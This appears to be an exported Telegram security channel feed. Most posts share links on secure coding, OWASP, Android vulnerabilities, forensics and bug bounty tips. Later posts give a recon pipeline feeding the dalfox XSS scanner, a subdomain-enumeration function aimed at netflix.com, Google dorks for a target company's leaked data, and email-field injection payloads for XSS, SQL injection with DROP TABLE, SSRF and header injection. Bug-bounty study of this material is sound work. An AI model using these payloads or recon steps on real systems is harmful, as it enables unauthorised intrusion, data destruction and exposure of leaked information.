#Beacon

Top 10 Secure Coding Practices

1. Validate input.
2. Heed compiler warnings.
3. Architect and design for security policies.
4. Keep it simple.
5. Default deny.
6. Adhere to the principle of least privilege.
7. Sanitize data sent to other systems.
8. Practice defense in depth.
9. Use effective quality assurance techniques.
10. Adopt a secure coding standard.

https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices

Bonus Secure Coding Practices
1. Define security requirements.
2. Model threats.

60 viewsedited 11:11

#Beacon

https://owasp.org/www-project-mobile-top-10/

owasp.org

OWASP Mobile Top 10 | OWASP Foundation

OWASP Mobile Top 10 on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.

57 views11:13

#Beacon

https://habr.com/ru/post/513928/

Хабр

Android изнутри: сравнение Dalvik и ART

Привет, Хабр! Около полугода назад я публиковал подробный «гайд» по JVM. Пост, в целом, зашел, а в комментариях спросили, не планируется ли “чего-то по андроиду”. Наконец, у меня дошли руки. В...

57 views11:13

#Beacon

https://spy-soft.net/popular-exploit-packs/

SPY-SOFT.NET

Самые популярные эксплоит-паки

В статье я расскажу про самые популярные эксплойт паки за всю историю с 2006 по 2018. Возможно, эксплоит-паки ждет еще более насыщенное будущее, чем описанное здесь прошлое.

54 views11:13

#Beacon

https://spy-soft.net/dangerous-vulnerabilities-android/

SPY-SOFT.NET

Самые опасные уязвимости Android

Как видите, за всю историю Android было много интересного, и мы в этой статье затронули лишь верхушку айсберга — самые опасные уязвимости Android. Достаточно начать копать, и вам откроются и другие маленькие и большие возможности.

58 views11:14

#Beacon

#Beacon pinned Deleted message

11:32

#Beacon

https://habr.com/ru/company/oleg-bunin/blog/438740/

Хабр

Управление секретами при помощи HashiCorp Vault

Как правильно хранить секреты? В репозитории, в системе деплоя или в системе управления конфигурациями? На личном компьютере, на серверах, а может в коробке под кроватью? А как управлять секретами,...

65 views11:50

#Beacon

https://securixy.kz/investigation/podborka-besplatnyh-utilit-kompjuternoj-kriminalistiki-forenziki.html/

64 views20:05

#Beacon

https://spy-soft.net/computer-forensics/#i-14

SPY-SOFT.NET

Компьютерная криминалистика (Форензика)

В этой статье мы рассмотрим утилиты и ссылки на полезные ресурсы связанные с форензикой. Форензика от А до Я. Слово «Форензика» появилось в русском языке от английского слова Forensics, что означает наука об исследовании компьютерных преступлений, попросту…

61 views20:05

#Beacon

https://www.youtube.com/watch?v=Vkc3P7byr4k&list=PLDLqQj8RuUFvlLDiPjIG-M-7GCZIB16wd

YouTube

A9:Using Components with Known Vulnerabilities (Svyat Login)

Known Security Vulnerabilities are those gaps in security that have been identified, either by the developer/vendor of the products used, by the user/developer or by the hacker/intruder. To exploit known security vulnerabilities, hackers identify a weak component…

70 views06:30

#Beacon

Forwarded from DIMOOON 🇺🇦🦅🇺🇸

MongoDB Pentesting for Absolute Beginners.pdf

3 MB

пентест монгодб, написано, как для ежей от ежей постарше.

94 views13:59

#Beacon

cat subs.txt | waybackurl > wayback
cat subs.txt | gau | anew wayback
cat subs.txt | hakrawler -depth 3 -plain | anew wayback
cat wayback | dalfox pipe -o result.txt

75 views04:21

#Beacon

https://www.infosecmatter.com/bug-bounty-tips/

InfosecMatter

Bug Bounty Tips - InfosecMatter

Currated collection of bug bounty tips collected from the bug bounty community on Twitter sharing their #bugbountytips to help us all find more vulnerabilities.

84 views05:22

#Beacon

#Beacon pinned «https://www.infosecmatter.com/bug-bounty-tips/»

05:22

#Beacon

Email payloads:

XSS:
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
Template Injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQLinj:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRF:
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
Parametr Pollution:
victim&email=attacker@example.com
Email Header Injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

98 viewsedited 05:41

#Beacon

Find Subdomains

rapiddns(){
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
 | grep -oP '_blank">\K[^<]*' \
 | grep -v http \
 | sort -u
}

rapiddns netflix.com

89 views05:50

#Beacon

Google dorks

site:codepad.co "company"
site:scribd.com "company"
site:npmjs.com "company"
site:npm.runkit.com "company"
site:libraries.io "company"
site:ycombinator.com "company"
site:coggle.it "company"
site:papaly.com "company"
site:google.com "company"
site:trello.com "company"
site:prezi.com "company"
site:jsdelivr.net "company"
site:codepen.io "company"
site:codeshare.io "company"
site:sharecode.io "company"
site:pastebin.com "company"
site:repl.it "company"
site:productforums.google.com "company"
site:gitter.im "company"
site:bitbucket.org "company"
site:zoom.us inurl:"company"
site:atlassian.net "company"
site:s3.amazonaws.com inurl:"company"
inurl:gitlab "company"

116 views06:55

About

Blog

Apps

Platform